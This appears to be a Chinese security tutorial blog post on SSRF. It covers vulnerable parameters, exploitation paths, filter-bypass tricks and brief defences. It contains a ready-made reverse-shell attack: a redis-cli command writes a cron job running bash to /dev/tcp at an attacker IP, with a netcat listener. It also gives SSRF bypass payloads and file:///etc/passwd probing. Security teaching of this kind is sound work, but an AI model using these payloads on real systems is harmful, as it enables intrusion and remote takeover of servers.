首页 > 其他分享 >SSRF攻击

SSRF攻击

时间:2024-05-17 14:41:54浏览次数:19  
标签:http SSRF 攻击 redis 访问 169.254 com

目录

SSRF攻击

服务端请求伪造

原理

事故多发地在url分享、收藏、网址翻译功能。
参数通常是:(其实就是参数值是另一个url的地方就有可能有SSRF)

share
link
url
src
like
u

漏洞利用

  • 通过外网服务器对内网进行信息收集,探测存活的主机和开放端口号、对内网web应用进行指纹识别。
  • 可以利用内网的redis未授权访问漏洞写定时任务反弹shell
  • 各种协议进行探测:http/file/dict/ftp/gopher

redis未授权访问访问漏洞进行攻击

redis未授权访问漏洞就是因为没有设定连接密码或者密码太过简单导致的。

  • 监听机:centos7.8
nc -lvvp 4444
  • 给通过目标主机的redis未授权访问漏洞写入反弹shell的指令
redis-cli -h 192.168.0.104 set xxx "\n\n* * * * * /bin/bash -i>&/dev/tcp/192.168.61.164/4444 0>&1\n\n"
# * * * * *表示每分钟执行一次,/bin/bash -i是创建一个bash终端,
# >&/dev/tcp/192.168.61.149/4444是发送给192.168.61.149的4444端口的监听程序。
config set dir /var/spool/cron 
config set dbfilename root  # 必须是某个用户的名称,
			#因为定时任务的文件名称是根据用户名称来的,可以是root用户的名称
save  #保存,会将redis中的数据保存到指定的目录和dbfilename指定的文件中去

监听机一会就能看到反弹回来的shell了
image

SSRF绕过方式

  • 限制为http://www.xxx.com 域名时(利用@)
    可以尝试采用http基本身份认证的方式绕过
    如:http://[email protected]@www.ccc.com,在对@解析域名中,如果是PHP的parse_url中会识别www.ccc.com,而libcurl则识别为www.bbb.com。
  • 短链接绕过:https://dwz.cn/
    通过一些短链接转换方式绕过黑名单。同时这种短链接转换还能进行一些钓鱼攻击行为。
  • 进制转换
    十进制的127.0.0.1可以换成八进制、十六进制都可以,不管是windows还是linux都能够解析
    image
    image
  • 特殊域名(不过现在不能用了,如果有道友找到另外的请务必分享一下,感激不尽)
    原理是DNS解析。xip.io可以指向任意域名,即
    127.0.0.1.xip.io,可解析为127.0.0.1
  • 利用[::],这个是针对ipv6的
    可以利用[::]来绕过localhost
    比如:http://169.254.169.254>>http://[::169.254.169.254]
    只要对方支持ipv6的ip地址访问就行
  • 利用句号
    127。0。0。1 >>> 127.0.0.1
    比如: ping 127。0。0。1,注意,linux系统才能识别,windows系统不能识别
  • CRLF 编码绕过
    %0d->0x0d->\r回车
    %0a->0x0a->\n换行
    HTTP头部注入
    example.com/?url=http://eval.com%0d%0aHOST:fuzz.com%0d%0a
  • 利用类似于颜文字的字母和数字(只有linux能解析)
利用Enclosed alphanumerics,有些输入法直接就可以输入这样的封闭字符
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> example.com
http://169.254.169.254>>>http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴
⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
比如ping ①②⑦.⓪.⓪.① 注意,也是linux系统支持

SSRF中URL的伪协议

以下所有可用的URL伪协议都可以在发现ssrf漏洞点的时候尝试一遍。

http:// 主要用于探测主机存活和端口的开放情况
file:/// 从文件系统中获取文件内容,如,file:///etc/passwd
dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info
gopher:// 分布式文档传递服务,可使用gopherus生成payload
ftp:// 针对21端口的探测
sftp:// SSH文件传输协议或安全文件传输协议
ldap:// 轻量级目录访问协议 windows 域控

SSRF漏防御手段

  • 过滤返回的信息,即使探测到了,你经过过滤后,内网信息依旧不回返回给用户
  • 限制请求的端口号:比如你对于该探测到的内网端口号只开放80的话,或者说本来就是开放给用户的该端口那就只开放那个端口号即可。否则就都关闭。
  • ip加黑或者加白
  • url限制死也是一种办法
  • 协议不用的都ban掉,以免出现问题

标签:http,SSRF,攻击,redis,访问,169.254,com
From: https://www.cnblogs.com/dhan/p/18197726

相关文章

  • CSRF攻击
    目录CSRF攻击原理CSRF攻击分类CSRF漏洞检测CSRFTester自解压手工检测防护手段CSRF攻击客户端跨站请求伪造原理案例1、用户登录了某银行网站,网站返回cookie给用户2、用户点开另一个黑客精心构造好的网站3、黑客这个网站中有些请求是某银行的一些交易请求,用户点进该网站的时......
  • Leedcode-提莫攻击
    自己写的,中间算法有遗漏的遍历classSolution:deffindPoisonedDuration(self,timeSeries:List[int],duration:int)->int:ifduration==0:#如果duration为0,则返回0,因为没有中毒时间return0count=0#初始化中毒总时间......
  • pwn知识——劫持IO-file_jumps攻击和environ攻击
    导言哎,异或fd指针真是令人讨厌IO_file_jumps_IO_lock_t_IO_stdfile,_IO_wide_data(针对宽字节的虚函数表),_IO_FILE_plus(含有stdin,stdout)三者均被定义为IO_file_jumps原理IO_file_jumps是一个全局变量符号,存有以下符号这个结构体主要跟缓冲区有关,比如调用puts,fread,fgets,ex......
  • 有研究表明,90% 的企业攻击始于钓鱼邮件
    电子邮件是重要的通信方式之一。电子邮件几乎可以立即发送到目标地址,这使得信息传递变得非常迅速,无论接收者位于世界的哪个角落,只要有互联网连接,他们都可以收到电子邮件,与社交媒体或即时通讯应用相比,电子邮件通常更受重视和信任。近日,安全人员研究表明,过去30天,62%的恶意文件通过......
  • 常见的安全模型、攻击模型和隐私需求
    参考文献:MiaoY,YangY,LiX,etal.ComprehensiveSurveyonPrivacy-PreservingSpatialDataQueryinTransportationSystems[J].IEEETransactionsonIntelligentTransportationSystems,2023.根据文章内容,Threatmodel主要有以下两种类型:1.Honest-but-Curious......
  • 5.7前端跨域CSRF和SSRF
    一、CSRF(跨站请求伪造)1、get类型(pikaqu靶场环境)前提:抓包获取请求地址,构造伪造请求站点,并保持用户登录状态点击伪造站点此时在其他主机,构造网站信息index.html文件,并伪造修改个人信息数据包;<scriptsrc='http://192.168.127.129:81/vul/csrf/csrfget/csrf_get_edit.php?sex=......
  • ssrf-基于Pikachu的学习
    SSRFSSRF漏洞原理攻击与防御(超详细总结)-CSDN博客原理服务端请求伪造(ServerSideRequestForgery,SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。比如......
  • Godot.NET C#IOC重构(11):攻击与死亡
    目录前言带上伤害HitboxHurtbox实现效果渐变淡出添加受攻击效果Hurtbox完善Enemy状态机结果剩下的都是逻辑完善的部分了,后面的我就跳过了。前言这次来深刻了解一下Godot中的伤害计算带上伤害我们将之前的Hitbox和HurtBox进行了一下简单的修改HitboxusingGodot;usingSyste......
  • DHU网络攻防靶场攻击记录
    DHU网络靶场攻击记录已知:靶场入口10.199.227.xxx不完整的网络拓扑图:环境准备:kali/wsl-kali/虚拟机kali以及windows或其他操作系统的本机工具准备:Fscannmaplaravel-CVE-2021-3129-EXP-main哥斯拉Burpsuitemsfconsole(主要)目录DHU网络靶场攻击记录如何挂代理入口处机......
  • Godot.NET C#IOC重构(9-10):三连击,攻击框
    目录前言AnimationPlayer和AnimatedSprite2D将导出属性添加到关键帧里面。状态机构建核心代码完整代码实现效果碰撞框和受攻击框全局类HitBox:攻击框HurtBox:受击框实现效果添加Player攻击总结前言这篇博客来深入讲解一下Godot中的AnimationPlayerAnimationPlayer和AnimatedSpr......